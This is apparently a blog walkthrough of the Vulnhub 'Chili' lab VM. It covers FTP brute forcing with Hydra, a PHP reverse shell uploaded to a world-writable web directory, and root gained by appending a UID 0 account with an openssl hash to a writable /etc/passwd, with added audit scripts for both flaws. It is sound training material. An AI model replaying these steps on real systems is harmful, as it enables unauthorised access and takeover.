Vulnhub Chili: Detailed Walkthrough

Chili

Identifying the target host's IP address

This VM cannot obtain an IP address automatically from VirtualBox; I solved that problem as described in another of my posts.

┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.60.0/16   |   Screen View: Unique Hosts                                                                                                                                                            
                                                                                                                                                                                                                                
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                                                                                
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                               
 192.168.56.100  08:00:27:49:52:e5      1      60  PCS Systemtechnik GmbH                                                                                                                                                       
 192.168.56.179  08:00:27:77:88:2e      1      60  PCS Systemtechnik GmbH      

Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.179.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.179 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-15 08:25 EST
Nmap scan report for bogon (192.168.56.179)
Host is up (0.000081s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Chili
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:77:88:2E (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.44 seconds

Get Access

First, take a look at the FTP service:

┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ ftp 192.168.56.179        
Connected to 192.168.56.179.
220 (vsFTPd 3.0.3)
Name (192.168.56.179:kali): anonymous
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed
ftp> 


The target does not allow anonymous login, and this version of vsFTPd has no exploitable vulnerability.

┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ curl http://192.168.56.179                                  

<html>
<body bgcolor="white">
<head>
<title>Chili</title>
<meta name="description" content="We Are Still Alive!">
<meta name="keywords" content="Chili">
<meta name="robots" content="index, follow">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="language" content="English">
</head>
<link href="https://fonts.googleapis.com/css?family=Righteous|Saira+Stencil+One&display=swap" rel="stylesheet">
<style type="text/css">
@font-face {
        font-family: 'Righteous', cursive;
        font-family: 'Saira Stencil One', cursive;
}
</style>
<center><br><br>
<img src="Chile_WEB.jpg" width="400px" height="400px"><br>
</center></body></html>

┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ wget http://192.168.56.179/Chile_WEB.jpg                                                                  
--2022-11-15 08:44:58--  http://192.168.56.179/Chile_WEB.jpg
Connecting to 192.168.56.179:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 74290 (73K) [image/jpeg]
Saving to: ‘Chile_WEB.jpg’

Chile_WEB.jpg                                            100%[===============================================================================================================================>]  72.55K  --.-KB/s    in 0.001s  

2022-11-15 08:44:58 (136 MB/s) - ‘Chile_WEB.jpg’ saved [74290/74290]

                                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ ls
Chile_WEB.jpg  nmap_full_scan
                                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ steghide extract -sf Chile_WEB.jpg                         
Enter passphrase: 
steghide: could not extract any data with that passphrase!
                                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ stegseek Chile_WEB.jpg /usr/share/wordlists/rockyou.txt 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.19% (132.4 MB)           
[!] error: Could not find a valid passphrase.

The image contains no useful information either.

┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ curl http://192.168.56.179/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.179 Port 80</address>
</body></html>

┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ gobuster dir -u http://192.168.56.179 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                       
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.179
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/15 08:46:20 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 279]
Progress: 218740 / 220561 (99.17%)===============================================================
2022/11/15 08:46:42 Finished
===============================================================
                                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ nikto -h http://192.168.56.179
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.179
+ Target Hostname:    192.168.56.179
+ Target Port:        80
+ Start Time:         2022-11-15 08:46:50 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 291, size: 5aecf355f0724, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2022-11-15 08:47:40 (GMT-5) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 

                                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ dirb http://192.168.56.179                                                                           

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Nov 15 08:47:54 2022
URL_BASE: http://192.168.56.179/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.179/ ----
+ http://192.168.56.179/index.html (CODE:200|SIZE:657)                                                                                                                                                                          
+ http://192.168.56.179/server-status (CODE:403|SIZE:279)                                                                                                                                                                       
                                                                                                                                                                                                                                
-----------------
END_TIME: Tue Nov 15 08:47:56 2022
DOWNLOADED: 4612 - FOUND: 2
                                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ gobuster dir -u http://192.168.56.179 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.179
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2022/11/15 08:48:56 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 657]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1101162 / 1102805 (99.85%)===============================================================
2022/11/15 08:50:56 Finished
===============================================================

Directory brute-forcing did not turn up anything of value, so the only option is to go back to the FTP service.

The author's hint is that when you feel stuck, think about the VM's name, which is chili.

So, using chili as the username, brute-force FTP with Hydra:

┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ hydra -l chili -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.179
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-15 08:54:41
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.56.179:21/
[STATUS] 288.00 tries/min, 288 tries in 00:01h, 14344111 to do in 830:06h, 16 active
[STATUS] 296.00 tries/min, 888 tries in 00:03h, 14343511 to do in 807:38h, 16 active
[STATUS] 290.43 tries/min, 2033 tries in 00:07h, 14342366 to do in 823:04h, 16 active
[STATUS] 287.07 tries/min, 4306 tries in 00:15h, 14340093 to do in 832:34h, 16 active
[21][ftp] host: 192.168.56.179   login: chili   password: a1b2c3d4
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-15 09:10:19

The FTP username and password were cracked successfully; now log in to FTP:

┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ ftp 192.168.56.179
Connected to 192.168.56.179.
220 (vsFTPd 3.0.3)
Name (192.168.56.179:kali): chili
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||32717|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -alh
229 Entering Extended Passive Mode (|||58811|)
150 Here comes the directory listing.
drwxr-xr-x    3 1000     1000         4096 Sep 08  2020 .
drwxr-xr-x    3 0        0            4096 Sep 08  2020 ..
-rw-r--r--    1 1000     1000          220 Sep 07  2020 .bash_logout
-rw-r--r--    1 1000     1000         3526 Sep 07  2020 .bashrc
drwxr-xr-x    3 1000     1000         4096 Sep 08  2020 .local
-rw-r--r--    1 1000     1000          807 Sep 07  2020 .profile
226 Directory send OK.
ftp> pwd
Remote directory: /home/chili
ftp> cd /var/www
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||18710|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        0            4096 Sep 08  2020 .
drwxr-xr-x   12 0        0            4096 Sep 08  2020 ..
drwxr-xr-x    4 0        0            4096 Sep 08  2020 html
226 Directory send OK.
ftp> cd html
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||37671|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0           74290 Oct 22  2018 Chile_WEB.jpg
-rw-r--r--    1 0        0             657 Sep 08  2020 index.html
226 Directory send OK.
ftp> 

The working directory can be changed freely and the web root can be entered, so a PHP script could be uploaded into the web root.

150 Here comes the directory listing.
drwxr-xr-x    4 0        0            4096 Sep 08  2020 .
drwxr-xr-x    3 0        0            4096 Sep 08  2020 ..
drwxrwxrwx    2 0        0            4096 Sep 08  2020 .nano
drwxr-xr-x    2 0        0            4096 Sep 08  2020 .vim
-rw-r--r--    1 0        0           74290 Oct 22  2018 Chile_WEB.jpg
-rw-r--r--    1 0        0             657 Sep 08  2020 index.html
226 Directory send OK.
ftp> 

The .nano directory is readable and writable by any user, so the file can be placed there.

ftp> cd .nano 
250 Directory successfully changed.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||35742|)
150 Ok to send data.
100% |*************************************************************************************************************************************************************************************|  5496       95.29 MiB/s    00:00 ETA
226 Transfer complete.
5496 bytes sent in 00:00 (4.15 MiB/s)
ftp> ls -alh
229 Entering Extended Passive Mode (|||13137|)
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Nov 15 17:15 .
drwxr-xr-x    4 0        0            4096 Sep 08  2020 ..
-rw-r--r--    1 1000     1000            0 Sep 08  2020 index.html
-rw-------    1 1000     1000         5496 Nov 15 17:15 shell.php
226 Directory send OK.
ftp> help
Commands may be abbreviated.  Commands are:

!               case            dir             fget            idle            mdelete         modtime         ntrans          progress        rcvbuf          rmdir           sndbuf          type
$               cd              disconnect      form            image           mdir            more            open            prompt          recv            rstatus         status          umask
account         cdup            edit            ftp             lcd             mget            mput            page            proxy           reget           runique         struct          unset
append          chmod           epsv            gate            less            mkdir           mreget          passive         put             remopts         send            sunique         usage
ascii           close           epsv4           get             lpage           mls             msend           pdir            pwd             rename          sendport        system          user
bell            cr              epsv6           glob            lpwd            mlsd            newer           pls             quit            reset           set             tenex           verbose
binary          debug           exit            hash            ls              mlst            nlist           pmlsd           quote           restart         site            throttle        xferbuf
bye             delete          features        help            macdef          mode            nmap            preserve        rate            rhelp           size            trace           ?
ftp> chmod 777 shell.php
200 SITE CHMOD command ok.
ftp> ls -alh
229 Entering Extended Passive Mode (|||30184|)
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Nov 15 17:15 .
drwxr-xr-x    4 0        0            4096 Sep 08  2020 ..
-rw-r--r--    1 1000     1000            0 Sep 08  2020 index.html
-rwxrwxrwx    1 1000     1000         5496 Nov 15 17:15 shell.php
226 Directory send OK.
ftp> 
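The condition exploited above is a world-writable dotfile directory inside the Apache document root, reachable by an FTP account that is not chrooted. The following audit script is an added example, not part of the original write-up; it walks a web root and reports hidden directories, world-writable directories and files, and server-side scripts writable by anyone other than their owner, and builds the write-up's `.nano/shell.php` layout in a temporary directory (constructed, with a placeholder file body) to demonstrate the findings.

```python
# Added example (not from the original write-up): audit a web document root
# for the conditions that let an FTP user drop shell.php into
# /var/www/html/.nano above. The demo layout is constructed in a temp dir.
import os
import stat
import tempfile

# File extensions Apache/CGI setups commonly execute server-side (assumption).
SCRIPT_EXTS = {".php", ".phtml", ".php5", ".cgi", ".pl", ".py", ".sh"}


def audit_webroot(root):
    """Return sorted (relative_path, reason) findings under root.
    Symlinks are skipped so a link out of the web root is not followed."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            full = os.path.join(dirpath, d)
            mode = os.lstat(full).st_mode
            if stat.S_ISLNK(mode):
                continue
            rel = os.path.relpath(full, root)
            if d.startswith("."):  # heuristic: editor/backup dirs like .nano
                findings.append((rel, "hidden directory in web root"))
            if mode & stat.S_IWOTH:
                findings.append((rel, "world-writable directory"))
        for f in filenames:
            full = os.path.join(dirpath, f)
            mode = os.lstat(full).st_mode
            if stat.S_ISLNK(mode):
                continue
            rel = os.path.relpath(full, root)
            if mode & stat.S_IWOTH:
                findings.append((rel, "world-writable file"))
            ext = os.path.splitext(f)[1].lower()
            if ext in SCRIPT_EXTS and mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((rel, "script writable by group or others"))
    return sorted(findings)


def build_demo_webroot(base):
    """Construct the layout from the write-up: index.html plus a mode-777
    .nano directory holding a mode-777 shell.php (placeholder contents)."""
    nano = os.path.join(base, ".nano")
    os.makedirs(nano)
    index = os.path.join(base, "index.html")
    with open(index, "w") as fh:
        fh.write("<html>Chili</html>\n")
    os.chmod(index, 0o644)
    shell = os.path.join(nano, "shell.php")
    with open(shell, "w") as fh:
        fh.write("<?php /* placeholder, not a real payload */ ?>\n")
    os.chmod(nano, 0o777)
    os.chmod(shell, 0o777)
    return base


def demo():
    """Build the demo web root in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_webroot(tmp)
        return audit_webroot(tmp)


if __name__ == "__main__":
    for path, reason in demo():
        print("FINDING: %s - %s" % (path, reason))
```

Run it against a real document root with `audit_webroot("/var/www/html")` as root; on the Chili VM the `.nano` directory and the uploaded `shell.php` would appear with the same reasons.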

┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ curl http://192.168.56.179/.nano/shell.php


The reverse shell is received successfully on Kali Linux:

┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ sudo nc -nlvp 5555
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.179] 35822
Linux chili 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
 17:17:26 up 54 min,  0 users,  load average: 0.00, 0.02, 0.21
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@chili:/$ 

Privilege escalation

Upload the linpeas.sh script to the target's /tmp directory, change its permissions, and run it.


╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                                                                                                                 
/dev/mqueue                                                                                                                                                                                                                       
/dev/shm
/etc/passwd
/run/lock
/run/lock/apache2
/tmp
/tmp/linpeas.sh
/var/cache/apache2/mod_cache_disk
/var/lib/php/sessions
/var/tmp
/var/www/html/.nano
/var/www/html/.nano/shell.php

The linpeas.sh script flags a suspicious file: /etc/passwd is writable.

www-data@chili:/tmp$ ls -alh /etc/passwd
ls -alh /etc/passwd
-rw-r--rw- 1 root root 1.5K Sep  8  2020 /etc/passwd

Use the openssl tool on Kali Linux to generate a password hash:

┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ openssl passwd -1 -salt jason 123456
$1$jason$kqq2SnNAGHtj7Joa0Zlp61

www-data@chili:/tmp$ echo 'jason:$1$jason$kqq2SnNAGHtj7Joa0Zlp61:0:0:root:/root:/bin/bash' >>/etc/passwd
www-data@chili:/tmp$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
chili:x:1000:1000:chili,,,:/home/chili:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
ftp:x:106:113:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
jason:$1$jason$kqq2SnNAGHtj7Joa0Zlp61:0:0:root:/root:/bin/bash
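What makes this escalation work is that `su` and `login` honour a hash placed directly in the second field of /etc/passwd, so a group- or world-writable passwd file is equivalent to root. The script below is an added example, not part of the original write-up: it parses passwd-format text, flags UID 0 accounts other than root and entries whose password field is a hash rather than the shadow indirection `x`, and checks the file mode shown above (`-rw-r--rw-`) for group/other write bits. The sample lines are taken from the write-up's `cat /etc/passwd` output.

```python
# Added example (not from the original write-up): audit /etc/passwd for the
# backdoor pattern shown above (UID 0 entry with an inline hash) and for a
# file mode that allows non-root users to append such a line.
import stat

# Constructed sample: the relevant lines from the write-up's cat /etc/passwd.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
chili:x:1000:1000:chili,,,:/home/chili:/bin/bash
jason:$1$jason$kqq2SnNAGHtj7Joa0Zlp61:0:0:root:/root:/bin/bash
"""


def parse_passwd(text):
    """Parse passwd text into (name, pw, uid, gid, gecos, home, shell) tuples.
    Malformed lines become findings instead of aborting the audit."""
    entries, bad = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            bad.append((lineno, "malformed line (expected 7 fields)"))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        try:
            entries.append((name, pw, int(uid), int(gid), gecos, home, shell))
        except ValueError:
            bad.append((lineno, "non-numeric uid/gid"))
    return entries, bad


def audit_passwd_entries(text):
    """Return a list of (username, reason) findings for backdoor-style entries."""
    entries, bad = parse_passwd(text)
    findings = [("<line %d>" % n, why) for n, why in bad]
    for name, pw, uid, _gid, _gecos, _home, _shell in entries:
        if uid == 0 and name != "root":
            findings.append((name, "UID 0 account other than root"))
        # "x" means the hash lives in /etc/shadow; "*", "!" and "!!" lock the account.
        if pw not in ("x", "*", "!", "!!"):
            findings.append((name, "password hash stored directly in /etc/passwd"))
    return findings


def passwd_mode_is_safe(mode):
    """/etc/passwd should be 0644 and root-owned; any group/other write bit is a
    finding. The write-up shows -rw-r--rw- (0o646), which allowed the append."""
    return not (mode & (stat.S_IWGRP | stat.S_IWOTH))


def mode_from_ls(perm_string):
    """Convert an ls-style string such as '-rw-r--rw-' to a numeric mode.
    Setuid/setgid/sticky letters (s, t) are simply counted as the execute bit."""
    mode = 0
    for i, ch in enumerate(perm_string[1:10]):
        if ch != "-":
            mode |= 1 << (8 - i)
    return mode


if __name__ == "__main__":
    for who, why in audit_passwd_entries(SAMPLE_PASSWD):
        print("FINDING:", who, "-", why)
    print("-rw-r--rw- safe?", passwd_mode_is_safe(mode_from_ls("-rw-r--rw-")))
```

On a live host, pair this with `os.stat("/etc/passwd").st_mode` and `pwd.getpwall()`; the fix for the Chili VM is simply `chmod 644 /etc/passwd` and removing the injected line.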

Switch directly to the jason user, which has superuser privileges:

www-data@chili:/tmp$ su - jason
su - jason
Password: 123456

root@chili:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@chili:~# ls -alh
ls -alh
total 32K
drwx------  3 root root 4.0K Sep  8  2020 .
drwxr-xr-x 18 root root 4.0K Sep  7  2020 ..
-rw-------  1 root root  126 Sep  8  2020 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4.0K Sep  8  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   47 Sep  8  2020 proof.txt
-rw-r--r--  1 root root  176 Sep  8  2020 .wget-hsts
root@chili:~# cat proof.txt
cat proof.txt
Sun_CSR.Chili.af6d45da1f1181347b9e2139f23c6a5b
root@chili:~# 

Privilege escalation successful!

posted @ 2022-11-15 22:35  Jason_huawen